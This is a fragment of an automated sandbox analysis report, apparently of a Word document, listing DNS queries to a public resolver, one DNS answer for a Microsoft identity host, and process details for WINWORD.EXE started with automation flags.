                                                                                                                                                      Dec 27, 2020 09:09:48.236224890 CET6293853192.168.2.38.8.8.8
                                                                                                                                                      Dec 27, 2020 09:09:48.295532942 CET53629388.8.8.8192.168.2.3
                                                                                                                                                      Dec 27, 2020 09:09:48.874748945 CET5570853192.168.2.38.8.8.8
                                                                                                                                                      Dec 27, 2020 09:09:48.939668894 CET53557088.8.8.8192.168.2.3
                                                                                                                                                      Dec 27, 2020 09:09:52.233355999 CET5680353192.168.2.38.8.8.8
                                                                                                                                                      Dec 27, 2020 09:09:52.304577112 CET53568038.8.8.8192.168.2.3
                                                                                                                                                      Dec 27, 2020 09:09:55.884567022 CET5714553192.168.2.38.8.8.8
                                                                                                                                                      Dec 27, 2020 09:09:55.941106081 CET53571458.8.8.8192.168.2.3
                                                                                                                                                      Dec 27, 2020 09:09:56.410672903 CET5535953192.168.2.38.8.8.8
                                                                                                                                                      Dec 27, 2020 09:09:56.469995975 CET53553598.8.8.8192.168.2.3

                                                                                                                                                      DNS Answers

Timestamp | Source IP | Dest IP | Trans ID | Reply Code | Name | CName | Address | Type | Class
Dec 27, 2020 09:09:48.295532942 CET | 8.8.8.8 | 192.168.2.3 | 0xf21c | No error (0) | prda.aadg.msidentity.com | www.tm.a.prd.aadg.trafficmanager.net | | CNAME (Canonical name) | IN (0x0001)

                                                                                                                                                      Code Manipulations

                                                                                                                                                      Statistics

                                                                                                                                                      System Behavior

                                                                                                                                                      General

Start time: 09:05:02
Start date: 27/12/2020
Path: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE
Wow64 process (32bit): true
Commandline: 'C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE' /Automation -Embedding
Imagebase: 0x1300000
File size: 1937688 bytes
MD5 hash: 0B9AB9B9C4DE429473D6450D4297A123
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Reputation: high

                                                                                                                                                      Disassembly
